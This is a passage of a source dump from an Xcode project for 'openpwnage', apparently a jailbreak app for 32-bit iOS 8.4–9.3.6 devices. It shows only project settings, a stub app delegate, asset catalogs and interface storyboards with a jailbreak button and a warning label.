 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>BuildLocationStyle</key>
 6 | 	<string>UseAppPreferences</string>
 7 | 	<key>CustomBuildLocationType</key>
 8 | 	<string>RelativeToDerivedData</string>
 9 | 	<key>DerivedDataLocationStyle</key>
10 | 	<string>Default</string>
11 | 	<key>IssueFilterStyle</key>
12 | 	<string>ShowActiveSchemeOnly</string>
13 | 	<key>LiveSourceIssuesEnabled</key>
14 | 	<true/>
15 | 	<key>ShowSharedSchemesAutomaticallyEnabled</key>
16 | 	<true/>
17 | </dict>
18 | </plist>
19 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/xcshareddata/xcschemes/openpwnage.xcscheme:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <Scheme
 3 |    LastUpgradeVersion = "1330"
 4 |    version = "1.3">
 5 |    <BuildAction
 6 |       parallelizeBuildables = "YES"
 7 |       buildImplicitDependencies = "YES">
 8 |       <BuildActionEntries>
 9 |          <BuildActionEntry
10 |             buildForTesting = "YES"
11 |             buildForRunning = "YES"
12 |             buildForProfiling = "YES"
13 |             buildForArchiving = "YES"
14 |             buildForAnalyzing = "YES">
15 |             <BuildableReference
16 |                BuildableIdentifier = "primary"
17 |                BlueprintIdentifier = "B05E8BB12810C16E00EA3CE0"
18 |                BuildableName = "openpwnage.app"
19 |                BlueprintName = "openpwnage"
20 |                ReferencedContainer = "container:openpwnage.xcodeproj">
21 |             </BuildableReference>
22 |          </BuildActionEntry>
23 |       </BuildActionEntries>
24 |    </BuildAction>
25 |    <TestAction
26 |       buildConfiguration = "Debug"
27 |       selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
28 |       selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
29 |       shouldUseLaunchSchemeArgsEnv = "YES">
30 |       <Testables>
31 |       </Testables>
32 |    </TestAction>
33 |    <LaunchAction
34 |       buildConfiguration = "Debug"
35 |       selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
36 |       selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
37 |       launchStyle = "0"
38 |       useCustomWorkingDirectory = "NO"
39 |       ignoresPersistentStateOnLaunch = "NO"
40 |       debugDocumentVersioning = "YES"
41 |       debugServiceExtension = "internal"
42 |       allowLocationSimulation = "YES">
43 |       <BuildableProductRunnable
44 |          runnableDebuggingMode = "0">
45 |          <BuildableReference
46 |             BuildableIdentifier = "primary"
47 |             BlueprintIdentifier = "B05E8BB12810C16E00EA3CE0"
48 |             BuildableName = "openpwnage.app"
49 |             BlueprintName = "openpwnage"
50 |             ReferencedContainer = "container:openpwnage.xcodeproj">
51 |          </BuildableReference>
52 |       </BuildableProductRunnable>
53 |    </LaunchAction>
54 |    <ProfileAction
55 |       buildConfiguration = "Release"
56 |       shouldUseLaunchSchemeArgsEnv = "YES"
57 |       savedToolIdentifier = ""
58 |       useCustomWorkingDirectory = "NO"
59 |       debugDocumentVersioning = "YES">
60 |       <BuildableProductRunnable
61 |          runnableDebuggingMode = "0">
62 |          <BuildableReference
63 |             BuildableIdentifier = "primary"
64 |             BlueprintIdentifier = "B05E8BB12810C16E00EA3CE0"
65 |             BuildableName = "openpwnage.app"
66 |             BlueprintName = "openpwnage"
67 |             ReferencedContainer = "container:openpwnage.xcodeproj">
68 |          </BuildableReference>
69 |       </BuildableProductRunnable>
70 |    </ProfileAction>
71 |    <AnalyzeAction
72 |       buildConfiguration = "Debug">
73 |    </AnalyzeAction>
74 |    <ArchiveAction
75 |       buildConfiguration = "Release"
76 |       revealArchiveInOrganizer = "YES">
77 |    </ArchiveAction>
78 | </Scheme>
79 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/xcuserdata/zachary7829.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <Bucket
 3 |    uuid = "2D7ED7EE-0D8F-4E24-90FB-A9BAB533F831"
 4 |    type = "1"
 5 |    version = "2.0">
 6 |    <Breakpoints>
 7 |       <BreakpointProxy
 8 |          BreakpointExtensionID = "Xcode.Breakpoint.FileBreakpoint">
 9 |          <BreakpointContent
10 |             uuid = "326A3271-5BCA-47B6-BD25-8AED16C06E67"
11 |             shouldBeEnabled = "No"
12 |             ignoreCount = "0"
13 |             continueAfterRunningActions = "No"
14 |             filePath = "openpwnage/patchfinder8.h"
15 |             startingColumnNumber = "9223372036854775807"
16 |             endingColumnNumber = "9223372036854775807"
17 |             startingLineNumber = "13"
18 |             endingLineNumber = "13"
19 |             landmarkName = "unknown"
20 |             landmarkType = "0">
21 |          </BreakpointContent>
22 |       </BreakpointProxy>
23 |    </Breakpoints>
24 | </Bucket>
25 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/xcuserdata/zachary7829.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>SchemeUserState</key>
 6 | 	<dict>
 7 | 		<key>openpwnage.xcscheme_^#shared#^_</key>
 8 | 		<dict>
 9 | 			<key>orderHint</key>
10 | 			<integer>0</integer>
11 | 		</dict>
12 | 	</dict>
13 | 	<key>SuppressBuildableAutocreation</key>
14 | 	<dict>
15 | 		<key>B05E8BB12810C16E00EA3CE0</key>
16 | 		<dict>
17 | 			<key>primary</key>
18 | 			<true/>
19 | 		</dict>
20 | 	</dict>
21 | </dict>
22 | </plist>
23 | 


--------------------------------------------------------------------------------
/openpwnage/AppDelegate.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  AppDelegate.h
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 4/20/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | 
10 | @interface AppDelegate : UIResponder <UIApplicationDelegate>
11 | 
12 | @property (strong, nonatomic) UIWindow *window;
13 | @end
14 | 
15 | 


--------------------------------------------------------------------------------
/openpwnage/AppDelegate.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  AppDelegate.m
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 4/20/22.
 6 | //
 7 | 
 8 | #import "AppDelegate.h"
 9 | 
10 | // #import "AppDelegate.h"
11 | 
12 | @interface AppDelegate ()
13 | 
14 | @end
15 | 
16 | @implementation AppDelegate
17 | 
18 | 
19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
20 |     return YES;
21 | }
22 | 
23 | 
24 | - (void)applicationWillResignActive:(UIApplication *)application {
25 |     return;
26 | }
27 | 
28 | 
29 | - (void)applicationDidEnterBackground:(UIApplication *)application {
30 |     return;
31 | }
32 | 
33 | 
34 | - (void)applicationWillEnterForeground:(UIApplication *)application {
35 |     return;
36 | }
37 | 
38 | 
39 | - (void)applicationDidBecomeActive:(UIApplication *)application {
40 |     return;
41 | }
42 | 
43 | 
44 | - (void)applicationWillTerminate:(UIApplication *)application {
45 |     return;
46 | }
47 | 
48 | @end
49 | 


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AccentColor.colorset/Contents.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "colors" : [
 3 |     {
 4 |       "idiom" : "universal"
 5 |     }
 6 |   ],
 7 |   "info" : {
 8 |     "author" : "xcode",
 9 |     "version" : 1
10 |   }
11 | }
12 | 


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
  1 | {
  2 |   "images" : [
  3 |     {
  4 |       "filename" : "openpwnagebeta7 (6).png",
  5 |       "idiom" : "iphone",
  6 |       "scale" : "2x",
  7 |       "size" : "20x20"
  8 |     },
  9 |     {
 10 |       "filename" : "openpwnagebeta7 (7).png",
 11 |       "idiom" : "iphone",
 12 |       "scale" : "3x",
 13 |       "size" : "20x20"
 14 |     },
 15 |     {
 16 |       "filename" : "openpwnagebeta7 (3).png",
 17 |       "idiom" : "iphone",
 18 |       "scale" : "2x",
 19 |       "size" : "29x29"
 20 |     },
 21 |     {
 22 |       "filename" : "openpwnagebeta7 (11).png",
 23 |       "idiom" : "iphone",
 24 |       "scale" : "3x",
 25 |       "size" : "29x29"
 26 |     },
 27 |     {
 28 |       "filename" : "openpwnagebeta7 (8)-1.png",
 29 |       "idiom" : "iphone",
 30 |       "scale" : "2x",
 31 |       "size" : "40x40"
 32 |     },
 33 |     {
 34 |       "filename" : "openpwnagebeta7 (1).png",
 35 |       "idiom" : "iphone",
 36 |       "scale" : "3x",
 37 |       "size" : "40x40"
 38 |     },
 39 |     {
 40 |       "filename" : "openpwnagebeta7 (1)-1.png",
 41 |       "idiom" : "iphone",
 42 |       "scale" : "2x",
 43 |       "size" : "60x60"
 44 |     },
 45 |     {
 46 |       "filename" : "openpwnagebeta7 (2).png",
 47 |       "idiom" : "iphone",
 48 |       "scale" : "3x",
 49 |       "size" : "60x60"
 50 |     },
 51 |     {
 52 |       "filename" : "openpwnagebeta7 (4).png",
 53 |       "idiom" : "ipad",
 54 |       "scale" : "1x",
 55 |       "size" : "20x20"
 56 |     },
 57 |     {
 58 |       "filename" : "openpwnagebeta7 (6)-1.png",
 59 |       "idiom" : "ipad",
 60 |       "scale" : "2x",
 61 |       "size" : "20x20"
 62 |     },
 63 |     {
 64 |       "filename" : "openpwnagebeta7 (5).png",
 65 |       "idiom" : "ipad",
 66 |       "scale" : "1x",
 67 |       "size" : "29x29"
 68 |     },
 69 |     {
 70 |       "filename" : "openpwnagebeta7 (3)-1.png",
 71 |       "idiom" : "ipad",
 72 |       "scale" : "2x",
 73 |       "size" : "29x29"
 74 |     },
 75 |     {
 76 |       "filename" : "openpwnagebeta7 (6)-2.png",
 77 |       "idiom" : "ipad",
 78 |       "scale" : "1x",
 79 |       "size" : "40x40"
 80 |     },
 81 |     {
 82 |       "filename" : "openpwnagebeta7 (8).png",
 83 |       "idiom" : "ipad",
 84 |       "scale" : "2x",
 85 |       "size" : "40x40"
 86 |     },
 87 |     {
 88 |       "filename" : "openpwnagebeta7 (9).png",
 89 |       "idiom" : "ipad",
 90 |       "scale" : "1x",
 91 |       "size" : "76x76"
 92 |     },
 93 |     {
 94 |       "filename" : "openpwnagebeta7 (10).png",
 95 |       "idiom" : "ipad",
 96 |       "scale" : "2x",
 97 |       "size" : "76x76"
 98 |     },
 99 |     {
100 |       "idiom" : "ipad",
101 |       "scale" : "2x",
102 |       "size" : "83.5x83.5"
103 |     },
104 |     {
105 |       "idiom" : "ios-marketing",
106 |       "scale" : "1x",
107 |       "size" : "1024x1024"
108 |     }
109 |   ],
110 |   "info" : {
111 |     "author" : "xcode",
112 |     "version" : 1
113 |   }
114 | }
115 | 


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1)-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1)-1.png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (10).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (10).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (11).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (11).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (2).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (2).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3)-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3)-1.png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (4).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (4).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (5).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (5).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-1.png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-2.png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (7).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (7).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8)-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8)-1.png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (9).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (9).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 |   "info" : {
3 |     "author" : "xcode",
4 |     "version" : 1
5 |   }
6 | }
7 | 


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset/Contents.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "images" : [
 3 |     {
 4 |       "filename" : "openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png",
 5 |       "idiom" : "universal",
 6 |       "scale" : "1x"
 7 |     },
 8 |     {
 9 |       "idiom" : "universal",
10 |       "scale" : "2x"
11 |     },
12 |     {
13 |       "idiom" : "universal",
14 |       "scale" : "3x"
15 |     }
16 |   ],
17 |   "info" : {
18 |     "author" : "xcode",
19 |     "version" : 1
20 |   }
21 | }
22 | 


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset/Contents.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "images" : [
 3 |     {
 4 |       "filename" : "openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png",
 5 |       "idiom" : "universal",
 6 |       "scale" : "1x"
 7 |     },
 8 |     {
 9 |       "idiom" : "universal",
10 |       "scale" : "2x"
11 |     },
12 |     {
13 |       "idiom" : "universal",
14 |       "scale" : "3x"
15 |     }
16 |   ],
17 |   "info" : {
18 |     "author" : "xcode",
19 |     "version" : 1
20 |   }
21 | }
22 | 


--------------------------------------------------------------------------------
/openpwnage/Assets.xcassets/openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png


--------------------------------------------------------------------------------
/openpwnage/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="20037" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" colorMatched="YES" initialViewController="01J-lp-oVM">
 3 |     <device id="retina6_1" orientation="portrait" appearance="light"/>
 4 |     <dependencies>
 5 |         <deployment identifier="iOS"/>
 6 |         <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="20020"/>
 7 |         <capability name="System colors in document resources" minToolsVersion="11.0"/>
 8 |         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
 9 |     </dependencies>
10 |     <scenes>
11 |         <!--View Controller-->
12 |         <scene sceneID="EHf-IW-A2E">
13 |             <objects>
14 |                 <viewController id="01J-lp-oVM" sceneMemberID="viewController">
15 |                     <layoutGuides>
16 |                         <viewControllerLayoutGuide type="top" id="cVw-tM-5pJ"/>
17 |                         <viewControllerLayoutGuide type="bottom" id="GXB-Dn-K7w"/>
18 |                     </layoutGuides>
19 |                     <view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3">
20 |                         <rect key="frame" x="0.0" y="0.0" width="414" height="896"/>
21 |                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
22 |                         <color key="backgroundColor" systemColor="systemBackgroundColor"/>
23 |                     </view>
24 |                 </viewController>
25 |                 <placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/>
26 |             </objects>
27 |             <point key="canvasLocation" x="53" y="375"/>
28 |         </scene>
29 |     </scenes>
30 |     <resources>
31 |         <systemColor name="systemBackgroundColor">
32 |             <color white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
33 |         </systemColor>
34 |     </resources>
35 | </document>
36 | 


--------------------------------------------------------------------------------
/openpwnage/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="20037" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" colorMatched="YES" initialViewController="BYZ-38-t0r">
  3 |     <device id="retina6_1" orientation="portrait" appearance="light"/>
  4 |     <dependencies>
  5 |         <deployment identifier="iOS"/>
  6 |         <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="20020"/>
  7 |         <capability name="System colors in document resources" minToolsVersion="11.0"/>
  8 |         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
  9 |     </dependencies>
 10 |     <scenes>
 11 |         <!--View Controller-->
 12 |         <scene sceneID="tne-QT-ifu">
 13 |             <objects>
 14 |                 <viewController id="BYZ-38-t0r" customClass="ViewController" sceneMemberID="viewController">
 15 |                     <layoutGuides>
 16 |                         <viewControllerLayoutGuide type="top" id="BSj-Og-mFV"/>
 17 |                         <viewControllerLayoutGuide type="bottom" id="JB5-GP-kdh"/>
 18 |                     </layoutGuides>
 19 |                     <view key="view" contentMode="scaleToFill" id="8bC-Xf-vdC">
 20 |                         <rect key="frame" x="0.0" y="0.0" width="414" height="842"/>
 21 |                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
 22 |                         <subviews>
 23 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="created by zachary7829" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="zBZ-dm-Eby">
 24 |                                 <rect key="frame" x="58" y="786" width="299" height="22"/>
 25 |                                 <autoresizingMask key="autoresizingMask" widthSizable="YES" flexibleMinY="YES"/>
 26 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
 27 |                                 <nil key="textColor"/>
 28 |                                 <nil key="highlightedColor"/>
 29 |                             </label>
 30 |                             <textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" fixedFrame="YES" editable="NO" textAlignment="natural" selectable="NO" translatesAutoresizingMaskIntoConstraints="NO" id="HyP-U7-VD8">
 31 |                                 <rect key="frame" x="14" y="245" width="385" height="499"/>
 32 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" widthSizable="YES" flexibleMaxX="YES" flexibleMinY="YES" heightSizable="YES" flexibleMaxY="YES"/>
 33 |                                 <color key="backgroundColor" systemColor="systemBackgroundColor"/>
 34 |                                 <string key="text">It seems as if the console/log view has failed to load... no idea why this could be the case. If this happens likely something is seriously wrong and I would recommend not proceeding further. This jailbreak is currently at this point in time not meant to be used by regular users / the general public. If anything breaks, well, I warned you :/.</string>
 35 |                                 <color key="textColor" systemColor="labelColor"/>
 36 |                                 <fontDescription key="fontDescription" type="system" pointSize="14"/>
 37 |                                 <textInputTraits key="textInputTraits" autocapitalizationType="sentences"/>
 38 |                             </textView>
 39 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="iOS 8.4b4-9.3.6 32-bit jailbreak" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="8tb-Te-A0P">
 40 |                                 <rect key="frame" x="66" y="126" width="281" height="22"/>
 41 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
 42 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
 43 |                                 <nil key="textColor"/>
 44 |                                 <nil key="highlightedColor"/>
 45 |                             </label>
 46 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="openpwnage" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="C7J-ac-s0P">
 47 |                                 <rect key="frame" x="15" y="42" width="385" height="78"/>
 48 |                                 <autoresizingMask key="autoresizingMask" widthSizable="YES" flexibleMinY="YES" heightSizable="YES" flexibleMaxY="YES"/>
 49 |                                 <fontDescription key="fontDescription" type="system" pointSize="70"/>
 50 |                                 <nil key="textColor"/>
 51 |                                 <nil key="highlightedColor"/>
 52 |                             </label>
 53 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="Not Supported" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="Ksb-hp-Ffy">
 54 |                                 <rect key="frame" x="118" y="201" width="177" height="20"/>
 55 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
 56 |                                 <color key="backgroundColor" systemColor="systemGray4Color"/>
 57 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
 58 |                                 <nil key="textColor"/>
 59 |                                 <nil key="highlightedColor"/>
 60 |                             </label>
 61 |                             <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="jT6-EU-Emg">
 62 |                                 <rect key="frame" x="37" y="776" width="43" height="36"/>
 63 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
 64 |                                 <color key="tintColor" systemColor="systemBlueColor"/>
 65 |                                 <state key="normal" title="Button"/>
 66 |                                 <buttonConfiguration key="configuration" style="plain" title="⚙"/>
 67 |                                 <connections>
 68 |                                     <segue destination="Crh-S9-hOh" kind="presentation" id="oYP-tn-IVt"/>
 69 |                                 </connections>
 70 |                             </button>
 71 |                             <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" adjustsImageWhenDisabled="NO" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="Z9x-Ze-sxS">
 72 |                                 <rect key="frame" x="131" y="194" width="153" height="32"/>
 73 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
 74 |                                 <inset key="imageEdgeInsets" minX="0.0" minY="0.0" maxX="2.2250738585072014e-308" maxY="0.0"/>
 75 |                                 <state key="normal" title="jailbreak" image="openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton"/>
 76 |                                 <connections>
 77 |                                     <action selector="jailbreakButtonPressed:" destination="BYZ-38-t0r" eventType="touchUpInside" id="QWq-y8-kRn"/>
 78 |                                 </connections>
 79 |                             </button>
 80 |                         </subviews>
 81 |                         <color key="backgroundColor" systemColor="systemBackgroundColor"/>
 82 |                     </view>
 83 |                     <navigationItem key="navigationItem" id="wt5-fb-4Dh"/>
 84 |                     <connections>
 85 |                         <outlet property="consoleView" destination="HyP-U7-VD8" id="chh-aV-0m7"/>
 86 |                         <outlet property="jbButton" destination="Z9x-Ze-sxS" id="x9z-MC-hGB"/>
 87 |                         <outlet property="notSupportedLabel" destination="Ksb-hp-Ffy" id="eAZ-my-v17"/>
 88 |                         <outlet property="openpwnLabel" destination="C7J-ac-s0P" id="h6x-Ut-rGE"/>
 89 |                         <outlet property="settingsButton" destination="jT6-EU-Emg" id="tav-pX-bS2"/>
 90 |                     </connections>
 91 |                 </viewController>
 92 |                 <placeholder placeholderIdentifier="IBFirstResponder" id="dkx-z0-nzr" sceneMemberID="firstResponder"/>
 93 |             </objects>
 94 |             <point key="canvasLocation" x="704.34782608695662" y="14.732142857142856"/>
 95 |         </scene>
 96 |         <!--SettingsViewController-->
 97 |         <scene sceneID="GiZ-fV-u2k">
 98 |             <objects>
 99 |                 <viewController title="SettingsViewController" id="Crh-S9-hOh" customClass="SettingsViewController" sceneMemberID="viewController">
100 |                     <layoutGuides>
